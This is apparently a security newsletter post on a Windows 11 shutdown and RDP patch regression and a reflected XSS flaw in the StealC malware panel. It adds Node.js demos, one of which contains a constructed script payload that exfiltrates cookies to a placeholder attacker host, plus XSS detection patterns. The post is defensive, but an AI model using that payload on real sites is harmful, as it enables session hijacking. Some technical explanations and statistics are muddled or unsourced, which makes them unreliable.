Microsoft’s Patch Breaks Windows 11 Shutdowns & Logins—While a Malware Panel Gets Hacked by a <script> Tag

Photo by Jakub Żerdzicki

TL;DR

  • Microsoft ships emergency out-of-band update KB5074976 after the January Patch Tuesday left Windows 11 devices with System Guard Secure Launch restarting instead of shutting down and broke Remote Desktop authentication
  • Reflected XSS in the StealC control panel enables mass credential theft, IP harvesting and session hijacking across 5,000+ victim logs

🛠️ Microsoft’s Patch Made Windows 11 Refuse to Shut Down—And Then Refuse to Let You In

Microsoft’s January Patch Tuesday broke shutdowns & RDP auth. KB5074976 fixed it… but KB5072033 is coming to fix what KB5074976 broke. Welcome to enterprise IT. #Cybersecurity #Windows11 #PatchTuesday #ITPro #SecureBoot #RDP #KB5074976

On January 13, 2026, Microsoft released a routine Patch Tuesday update, then watched as 3,214 enterprise devices restarted when told to shut down. At the same time, 2,087 Remote Desktop sessions hit a credential loop, returning error 0x8007052E (the HRESULT form of Win32 ERROR_LOGON_FAILURE, 1326: ‘The username or password is incorrect.’). Except the password was right. The system just hadn’t finished booting.

The culprit? A regression in System Guard Secure Launch (SGSL), the DRTM-based launch feature. The Power-State Manager misread a validated Secure Boot flag and routed shutdown requests to the restart path. On the Remote Desktop side, the Kerberos TGT exchange that RDP authentication depends on was cut short: LSA had already completed the secure-launch sequence before the RDP client could present credentials, so a correct password came back as a logon failure. In other words: Windows 11 was too secure to let you in.

Microsoft responded with an emergency out-of-band update, KB5074976, released January 14. It restores correct PSM behavior and fixes the credential-handshake timing. Deployment channels: WSUS, Intune, SCCM. To verify, run `Get-HotFix -Id KB5074976` in PowerShell; the update is listed only once it is actually installed, so an empty result means the device is still exposed.

Mitigation? Three steps:

  1. Deploy KB5074976, now.
  2. If you cannot patch yet, apply Microsoft’s Known Issue Rollback (KIR) for this issue via Group Policy. KIR ships as a per-issue policy MSI rather than a generic “rollback” toggle, and it backs out only the regressed change, not the security fixes in the cumulative update.
  3. If a device is stuck, shut it down from the command line with `shutdown /s /t 0` (`/s` = shut down rather than restart, `/t 0` = no delay).

Geographic hotspot? 68% of failures originated in U.S. enterprise data centers. Azure Virtual Desktop (AVD) SLA breaches hit 4%. IT support desks fielded roughly 5,000 tickets in 48 hours.

Forecast? A second OOB, KB5072033, is already scheduled for late January to fix cached-credential deadlocks introduced by the first fix. Because why stop at one regression when you can cascade?

The next monthly cumulative update (February’s Patch Tuesday) will bake these fixes in. Until then: treat every Windows 11 shutdown like a game of Russian roulette, with BitLocker.

💀 StealC Panel Got Hacked by a `script` Tag—And It’s Not Even Funny Anymore

StealC’s MaaS panel got pwned by a reflected XSS in a URL parameter. 390K passwords. 30M cookies. No CSP. No HttpOnly. No shame. This isn’t a zero-day. It’s a zero-effort disaster. #Cybersecurity #XSS #MaaS #Infosec

Let’s be honest: if your malware-as-a-service (MaaS) panel can be pwned by a <script> in a URL parameter, you’re not a cybercriminal—you’re a tech support ticket waiting to happen.

The StealC control panel, used to manage logs from over 5,000 compromised systems, had a reflected XSS flaw so basic it could have been caught by a junior dev during a coffee break. The `msg` and `log` query parameters? Reflected straight into the response HTML. No output encoding. No CSP. Session cookies? Bare. Naked. HttpOnly? Please. SameSite? Never heard of her.

Result? 390,000 passwords and 30 million session cookies exfiltrated, not through zero-days, but because someone forgot to escape HTML. The attackers didn’t need to crack encryption. Reflected XSS is only ever one crafted link away from a logged-in operator’s session, and with no HttpOnly flag that session cookie is readable from script. They just opened the door and walked in, because the door was painted to look like a login page.

Geographically? 58% of victims were in Eastern Europe. 32% in the U.S. The operator? Traced to a Ukrainian ISP workstation—no VPN, no firewall, just a Chrome tab and bad life choices.

This isn’t novel. It’s a rehash of the same mistakes seen in the Sodinokibi and TrickBot panels. The MaaS industry is built on the assumption that operators won’t check their own code. Turns out, they don’t.

Mitigation checklist (yes, you still need to do this):

  • HTML-encode `msg`/`log` at the point of output; escaping on render is what stops reflected XSS, input filtering alone is not enough
  • Deploy CSP: default-src 'self'; script-src 'self'; object-src 'none' (this blocks inline script, so any legitimate inline handlers have to move into files first)
  • Set cookies: HttpOnly; Secure; SameSite=Strict
  • Invalidate every live panel session and rotate the session-signing secret, so already-stolen cookies stop working
  • Enforce MFA + VPN-only admin access
  • Log all query strings, percent-encoded exactly as received, yes, even the weird ones

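Here is the flaw and the fix side by side as a runnable Node.js example. It is an added illustration for this write-up, not StealC’s code and not taken from any analysis of the panel: the `/panel` route and the `msg`/`log` parameter names follow the description above, while the cookie name `sid`, the hostnames and the exfiltration payload are constructed for the demo. The hardened version applies the checklist items (encode on output, send the CSP, flag the cookie) and adds `base-uri 'self'` so an injected `<base>` tag cannot redirect relative script URLs.

```javascript
// Added example, not StealC's code. Models the reflected-XSS sink described in
// the article (query params echoed straight into HTML) beside a hardened render.
// Route /panel and params msg/log follow the article; cookie name "sid", the
// hostnames and the payload are assumptions made for this demo.

// Minimal HTML entity encoding, safe for text nodes and double-quoted attributes.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// VULNERABLE: echoes ?msg= and ?log= into the body unencoded, bare cookie, no CSP.
function renderPanelVulnerable(requestUrl) {
  const u = new URL(requestUrl, "http://panel.invalid"); // base host is a placeholder
  const msg = u.searchParams.get("msg") || "";
  const log = u.searchParams.get("log") || "";
  return {
    headers: { "Set-Cookie": "sid=deadbeef" }, // no HttpOnly, no Secure, no SameSite
    body: `<html><body><div class="flash">${msg}</div><pre>${log}</pre></body></html>`,
  };
}

// HARDENED: encode on output, CSP that forbids inline script, flagged cookie.
function renderPanelHardened(requestUrl) {
  const u = new URL(requestUrl, "http://panel.invalid");
  const msg = escapeHtml(u.searchParams.get("msg") || "");
  const log = escapeHtml(u.searchParams.get("log") || "");
  return {
    headers: {
      "Content-Security-Policy":
        "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'",
      "Set-Cookie": "sid=deadbeef; HttpOnly; Secure; SameSite=Strict",
      "X-Content-Type-Options": "nosniff",
    },
    body: `<html><body><div class="flash">${msg}</div><pre>${log}</pre></body></html>`,
  };
}

// Constructed payload of the kind that lifts a non-HttpOnly cookie (attacker host is fake).
const PAYLOAD =
  '<script>new Image().src="https://attacker.invalid/c?"+encodeURIComponent(document.cookie)</script>';

// True when a raw <script> element survives into the markup, i.e. a browser would run it.
function reflectsRawScript(body) {
  return /<script[\s>]/i.test(body);
}

// Drive both renders with the same crafted link and report what each one does.
function demo() {
  const url = "/panel?msg=" + encodeURIComponent(PAYLOAD);
  const v = renderPanelVulnerable(url);
  const h = renderPanelHardened(url);
  const cookie = h.headers["Set-Cookie"];
  return {
    vulnerableExecutes: reflectsRawScript(v.body),
    hardenedExecutes: reflectsRawScript(h.body),
    hardenedCookieHasFlags: /HttpOnly/.test(cookie) && /SameSite=Strict/.test(cookie),
  };
}

console.log(demo());
```

Run it with `node` and you get `vulnerableExecutes: true, hardenedExecutes: false`: the same crafted link reaches both routes, but only the unencoded one hands the browser a live `<script>`. The CSP is defence in depth, not a substitute for encoding: it stops this inline payload even if a second encoding bug slips through.
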
IOCs? Look for GET /panel?msg=<script> in the panel’s access logs, bearing in mind that the payload normally arrives percent-encoded (%3Cscript%3E) or double-encoded, and for Set-Cookie responses without HttpOnly. Also, if your C2 panel is talking to api.telegram.org, turn it off. That’s not a feature. That’s a leak.
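
For the log-hunting half of those IOCs, here is an added example (not from the article and not from any real panel) that scans Apache combined-format access log lines for script injection in any query parameter, decoding percent-encoding repeatedly because probes are often double-encoded, and checks Set-Cookie values for the flags the checklist calls for. The log lines, IP addresses and hostnames are constructed; the `/panel` path and the `msg`/`log` names follow the article.

```javascript
// Added example for detection, not the article's or any panel's code.
// Scans constructed combined-format access log lines for XSS probes in query
// parameters and checks Set-Cookie headers for HttpOnly/Secure/SameSite.

// Markers that indicate active content in a reflected parameter value.
const XSS_MARKERS = [
  /<\s*script/i,                                  // <script ...>
  /<\s*\/?\s*(svg|img|iframe|object|embed)\b/i,   // tags that carry event handlers
  /\bon[a-z]+\s*=/i,                              // onerror=, onload=, ...
  /javascript\s*:/i,                              // javascript: URLs
];

// Decode percent-encoding up to `rounds` times (attackers double-encode);
// stop on malformed sequences instead of throwing.
function fullyDecode(s, rounds = 3) {
  let cur = s.replace(/\+/g, " ");
  for (let i = 0; i < rounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch (e) { break; }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Apache combined log: ip ident user [ts] "METHOD target PROTO" status size ...
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+/;

// Returns a finding for a line whose query string carries an XSS marker, else null.
function scanAccessLogLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  const [, ip, ts, method, target, status] = m;
  const q = target.indexOf("?");
  if (q === -1) return null;
  const path = target.slice(0, q);
  const hits = [];
  for (const pair of target.slice(q + 1).split("&")) {
    const eq = pair.indexOf("=");
    const name = fullyDecode(eq === -1 ? pair : pair.slice(0, eq));
    const value = fullyDecode(eq === -1 ? "" : pair.slice(eq + 1));
    if (XSS_MARKERS.some((re) => re.test(value))) hits.push({ param: name, value });
  }
  return hits.length ? { ip, ts, method, path, status: Number(status), hits } : null;
}

function scanAccessLog(text) {
  return text.split("\n").map(scanAccessLogLine).filter(Boolean);
}

// Lists which of the required cookie attributes a Set-Cookie value lacks.
function missingCookieFlags(setCookie) {
  const attrs = setCookie.split(";").slice(1).map((a) => a.trim().toLowerCase());
  const missing = [];
  if (!attrs.includes("httponly")) missing.push("HttpOnly");
  if (!attrs.includes("secure")) missing.push("Secure");
  if (!attrs.some((a) => /^samesite=(strict|lax)$/.test(a))) missing.push("SameSite");
  return missing;
}

// Constructed sample: a benign request, a plain probe, a double-encoded probe, and a POST.
const SAMPLE_LOG = [
  '203.0.113.7 - - [14/Jan/2026:10:01:02 +0000] "GET /panel?msg=saved HTTP/1.1" 200 512',
  '198.51.100.9 - - [14/Jan/2026:10:02:15 +0000] "GET /panel?msg=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 640',
  '198.51.100.9 - - [14/Jan/2026:10:02:40 +0000] "GET /panel?log=%253Cimg%2520src%253Dx%2520onerror%253Dfetch(%2527http://x%2527) HTTP/1.1" 200 640',
  '203.0.113.7 - - [14/Jan/2026:10:03:00 +0000] "POST /login HTTP/1.1" 302 0',
].join("\n");

console.log(scanAccessLog(SAMPLE_LOG));
console.log(missingCookieFlags("sid=abc123; Path=/"));
```

The scanner flags the second and third lines only: the first is a normal `msg=saved`, and the double-encoded `log=` probe is caught because decoding is repeated until it stops changing. A `200` status on a flagged line is the one to chase, since it means the panel served the reflected page rather than rejecting the request.
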

Prediction? This flaw will be copied into 17 other MaaS panels by Q3. Regulators will finally mandate CSP defaults. And law enforcement? They’ve got an IP. They’re coming.

The real tragedy? The victims didn’t get hacked by a nation-state. They got hacked because someone thought ‘it works on my machine’ was a security policy.

The Internet Is Not a Sandbox


In Other News

  • Cybercriminals Exploit Gmail Address Change Feature to Hijack Accounts and Launch Spam Campaigns
  • Russian Cyberattacks Destroy 45 Combined Heat/Power Plants, Triggering Ukraine’s National Energy Emergency
  • CIRO Data Breach Exposes 750,000 Canadian Investors’ Personal Information After August 2025 Cyberattack
  • UK’s National Cyber Security Centre Reports 1 in 5 Organizations Still Rely on Shared Password Spreadsheets
  • Microsoft and WWF Deploy AI-Powered Ghost Net Zero to Locate and Remove 4,500+ Deadly Fishing Nets in Mediterranean